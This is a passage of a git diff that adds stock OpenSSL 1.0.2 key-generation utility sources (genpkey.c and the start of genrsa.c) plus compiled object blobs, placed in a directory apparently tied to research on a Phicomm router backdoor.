zJ;L!@qttnU@Ls~t6TXXZ4X!a^f8wv4Lir<U*BW3U*du!9VR_})DJ$f{M}HQ=kNqq(
zkk7M_lf?|0>mk^`;y(>`229{z0y_ks-h+I9Bl1I;LMZ2CVJGJv0ap~XhhZZGf2@@w
z_^&QB@W!Q`|I1q^Fii4$o0s!!<u#u1U5<0F6Mi)P4i|lp4&f#N67DUqo;u7x!nF-1
ze8wObk2OR*HTwe+9BpY@3mMe>PyKPvhMM?np-I;NvQJpnFVCIegxB~iqv;}U)*!9%
zPUWNYlV`ja<aOByE*fz2RwemuabJr6N>t2A$Ttdq4X$aD{V&;9-~u)M{;k44Ck@5f
z@1Fu*ZTwr8dk%7(as07Mq`&0V>PF9JME%3qI7m2+urK}osOcLbAYg}^AV{zH8s_gm
S+;dg)H$?pRbCsEc-~Zn%*_iqO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.c
new file mode 100644
index 0000000..fef21dc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.c
@@ -0,0 +1,405 @@
+/* apps/genpkey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+static int init_keygen_file(BIO *err, EVP_PKEY_CTX **pctx,
+                            const char *file, ENGINE *e);
+static int genpkey_cb(EVP_PKEY_CTX *ctx);
+
+#define PROG genpkey_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char **args, *outfile = NULL;
+    char *passarg = NULL;
+    BIO *in = NULL, *out = NULL;
+    const EVP_CIPHER *cipher = NULL;
+    int outformat;
+    int text = 0;
+    EVP_PKEY *pkey = NULL;
+    EVP_PKEY_CTX *ctx = NULL;
+    char *pass = NULL;
+    int badarg = 0;
+    int ret = 1, rv;
+
+    int do_param = 0;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    outformat = FORMAT_PEM;
+
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+    args = argv + 1;
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-outform")) {
+            if (args[1]) {
+                args++;
+                outformat = str2fmt(*args);
+            } else
+                badarg = 1;
+        } else if (!strcmp(*args, "-pass")) {
+            if (!args[1])
+                goto bad;
+            passarg = *(++args);
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*args, "-engine") == 0) {
+            if (!args[1])
+                goto bad;
+            e = setup_engine(bio_err, *(++args), 0);
+        }
+#endif
+        else if (!strcmp(*args, "-paramfile")) {
+            if (!args[1])
+                goto bad;
+            args++;
+            if (do_param == 1)
+                goto bad;
+            if (!init_keygen_file(bio_err, &ctx, *args, e))
+                goto end;
+        } else if (!strcmp(*args, "-out")) {
+            if (args[1]) {
+                args++;
+                outfile = *args;
+            } else
+                badarg = 1;
+        } else if (strcmp(*args, "-algorithm") == 0) {
+            if (!args[1])
+                goto bad;
+            if (!init_gen_str(bio_err, &ctx, *(++args), e, do_param))
+                goto end;
+        } else if (strcmp(*args, "-pkeyopt") == 0) {
+            if (!args[1])
+                goto bad;
+            if (!ctx) {
+                BIO_puts(bio_err, "No keytype specified\n");
+                goto bad;
+            } else if (pkey_ctrl_string(ctx, *(++args)) <= 0) {
+                BIO_puts(bio_err, "parameter setting error\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else if (strcmp(*args, "-genparam") == 0) {
+            if (ctx)
+                goto bad;
+            do_param = 1;
+        } else if (strcmp(*args, "-text") == 0)
+            text = 1;
+        else {
+            cipher = EVP_get_cipherbyname(*args + 1);
+            if (!cipher) {
+                BIO_printf(bio_err, "Unknown cipher %s\n", *args + 1);
+                badarg = 1;
+            }
+            if (do_param == 1)
+                badarg = 1;
+        }
+        args++;
+    }
+
+    if (!ctx)
+        badarg = 1;
+
+    if (badarg) {
+ bad:
+        BIO_printf(bio_err, "Usage: genpkey [options]\n");
+        BIO_printf(bio_err, "where options may be\n");
+        BIO_printf(bio_err, "-out file          output file\n");
+        BIO_printf(bio_err,
+                   "-outform X         output format (DER or PEM)\n");
+        BIO_printf(bio_err,
+                   "-pass arg          output file pass phrase source\n");
+        BIO_printf(bio_err,
+                   "-<cipher>          use cipher <cipher> to encrypt the key\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e          use engine e, possibly a hardware device.\n");
+#endif
+        BIO_printf(bio_err, "-paramfile file    parameters file\n");
+        BIO_printf(bio_err, "-algorithm alg     the public key algorithm\n");
+        BIO_printf(bio_err,
+                   "-pkeyopt opt:value set the public key algorithm option <opt>\n"
+                   "                   to value <value>\n");
+        BIO_printf(bio_err,
+                   "-genparam          generate parameters, not key\n");
+        BIO_printf(bio_err, "-text              print the in text\n");
+        BIO_printf(bio_err,
+                   "NB: options order may be important!  See the manual page.\n");
+        goto end;
+    }
+
+    if (!app_passwd(bio_err, passarg, NULL, &pass, NULL)) {
+        BIO_puts(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "wb"))) {
+            BIO_printf(bio_err, "Can't open output file %s\n", outfile);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+
+    EVP_PKEY_CTX_set_cb(ctx, genpkey_cb);
+    EVP_PKEY_CTX_set_app_data(ctx, bio_err);
+
+    if (do_param) {
+        if (EVP_PKEY_paramgen(ctx, &pkey) <= 0) {
+            BIO_puts(bio_err, "Error generating parameters\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else {
+        if (EVP_PKEY_keygen(ctx, &pkey) <= 0) {
+            BIO_puts(bio_err, "Error generating key\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (do_param)
+        rv = PEM_write_bio_Parameters(out, pkey);
+    else if (outformat == FORMAT_PEM)
+        rv = PEM_write_bio_PrivateKey(out, pkey, cipher, NULL, 0, NULL, pass);
+    else if (outformat == FORMAT_ASN1)
+        rv = i2d_PrivateKey_bio(out, pkey);
+    else {
+        BIO_printf(bio_err, "Bad format specified for key\n");
+        goto end;
+    }
+
+    if (rv <= 0) {
+        BIO_puts(bio_err, "Error writing key\n");
+        ERR_print_errors(bio_err);
+    }
+
+    if (text) {
+        if (do_param)
+            rv = EVP_PKEY_print_params(out, pkey, 0, NULL);
+        else
+            rv = EVP_PKEY_print_private(out, pkey, 0, NULL);
+
+        if (rv <= 0) {
+            BIO_puts(bio_err, "Error printing key\n");
+            ERR_print_errors(bio_err);
+        }
+    }
+
+    ret = 0;
+
+ end:
+    if (pkey)
+        EVP_PKEY_free(pkey);
+    if (ctx)
+        EVP_PKEY_CTX_free(ctx);
+    if (out)
+        BIO_free_all(out);
+    BIO_free(in);
+    if (pass)
+        OPENSSL_free(pass);
+
+    return ret;
+}
+
+static int init_keygen_file(BIO *err, EVP_PKEY_CTX **pctx,
+                            const char *file, ENGINE *e)
+{
+    BIO *pbio;
+    EVP_PKEY *pkey = NULL;
+    EVP_PKEY_CTX *ctx = NULL;
+    if (*pctx) {
+        BIO_puts(err, "Parameters already set!\n");
+        return 0;
+    }
+
+    pbio = BIO_new_file(file, "r");
+    if (!pbio) {
+        BIO_printf(err, "Can't open parameter file %s\n", file);
+        return 0;
+    }
+
+    pkey = PEM_read_bio_Parameters(pbio, NULL);
+    BIO_free(pbio);
+
+    if (!pkey) {
+        BIO_printf(bio_err, "Error reading parameter file %s\n", file);
+        return 0;
+    }
+
+    ctx = EVP_PKEY_CTX_new(pkey, e);
+    if (!ctx)
+        goto err;
+    if (EVP_PKEY_keygen_init(ctx) <= 0)
+        goto err;
+    EVP_PKEY_free(pkey);
+    *pctx = ctx;
+    return 1;
+
+ err:
+    BIO_puts(err, "Error initializing context\n");
+    ERR_print_errors(err);
+    if (ctx)
+        EVP_PKEY_CTX_free(ctx);
+    if (pkey)
+        EVP_PKEY_free(pkey);
+    return 0;
+
+}
+
+int init_gen_str(BIO *err, EVP_PKEY_CTX **pctx,
+                 const char *algname, ENGINE *e, int do_param)
+{
+    EVP_PKEY_CTX *ctx = NULL;
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    ENGINE *tmpeng = NULL;
+    int pkey_id;
+
+    if (*pctx) {
+        BIO_puts(err, "Algorithm already set!\n");
+        return 0;
+    }
+
+    ameth = EVP_PKEY_asn1_find_str(&tmpeng, algname, -1);
+
+#ifndef OPENSSL_NO_ENGINE
+    if (!ameth && e)
+        ameth = ENGINE_get_pkey_asn1_meth_str(e, algname, -1);
+#endif
+
+    if (!ameth) {
+        BIO_printf(bio_err, "Algorithm %s not found\n", algname);
+        return 0;
+    }
+
+    ERR_clear_error();
+
+    EVP_PKEY_asn1_get0_info(&pkey_id, NULL, NULL, NULL, NULL, ameth);
+#ifndef OPENSSL_NO_ENGINE
+    if (tmpeng)
+        ENGINE_finish(tmpeng);
+#endif
+    ctx = EVP_PKEY_CTX_new_id(pkey_id, e);
+
+    if (!ctx)
+        goto err;
+    if (do_param) {
+        if (EVP_PKEY_paramgen_init(ctx) <= 0)
+            goto err;
+    } else {
+        if (EVP_PKEY_keygen_init(ctx) <= 0)
+            goto err;
+    }
+
+    *pctx = ctx;
+    return 1;
+
+ err:
+    BIO_printf(err, "Error initializing %s context\n", algname);
+    ERR_print_errors(err);
+    if (ctx)
+        EVP_PKEY_CTX_free(ctx);
+    return 0;
+
+}
+
+static int genpkey_cb(EVP_PKEY_CTX *ctx)
+{
+    char c = '*';
+    BIO *b = EVP_PKEY_CTX_get_app_data(ctx);
+    int p;
+    p = EVP_PKEY_CTX_get_keygen_info(ctx, 0);
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(b, &c, 1);
+    (void)BIO_flush(b);
+#ifdef LINT
+    p = n;
+#endif
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..f5064ab610d915afe7e56e1865c40c52eba2ae96
GIT binary patch
literal 12184
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
J<+n5c{|57dz={9>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.c
new file mode 100644
index 0000000..91e6550
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.c
@@ -0,0 +1,350 @@
+/* apps/genrsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h>
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#ifndef OPENSSL_NO_RSA
+# include <stdio.h>
+# include <string.h>
+# include <sys/types.h>
+# include <sys/stat.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/rsa.h>
+# include <openssl/evp.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+# include <openssl/rand.h>
+
+# define DEFBITS 2048
+# undef PROG
+# define PROG genrsa_main
+
+static int MS_CALLBACK genrsa_cb(int p, int n, BN_GENCB *cb);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    BN_GENCB cb;
+# ifndef OPENSSL_NO_ENGINE
+    ENGINE *e = NULL;
+# endif
+    int ret = 1;
+    int i, num = DEFBITS;
+    long l;
+    const EVP_CIPHER *enc = NULL;
+    unsigned long f4 = RSA_F4;
+    char *outfile = NULL;
+    char *passargout = NULL, *passout = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    char *inrand = NULL;
+    BIO *out = NULL;
+    BIGNUM *bn = BN_new();
+    RSA *rsa = NULL;
+
+    if (!bn)
+        goto err;
+
+    apps_startup();
+    BN_GENCB_set(&cb, genrsa_cb, bio_err);
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto err;
+    if ((out = BIO_new(BIO_s_file())) == NULL) {
+        BIO_printf(bio_err, "unable to create BIO for output\n");
+        goto err;
+    }
+
+    argv++;
+    argc--;
+    for (;;) {
+        if (argc <= 0)
+            break;
+        if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-3") == 0)
+            f4 = 3;
+        else if (strcmp(*argv, "-F4") == 0 || strcmp(*argv, "-f4") == 0)
+            f4 = RSA_F4;
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        }
+# ifndef OPENSSL_NO_DES
+        else if (strcmp(*argv, "-des") == 0)
+            enc = EVP_des_cbc();
+        else if (strcmp(*argv, "-des3") == 0)
+            enc = EVP_des_ede3_cbc();
+# endif
+# ifndef OPENSSL_NO_IDEA
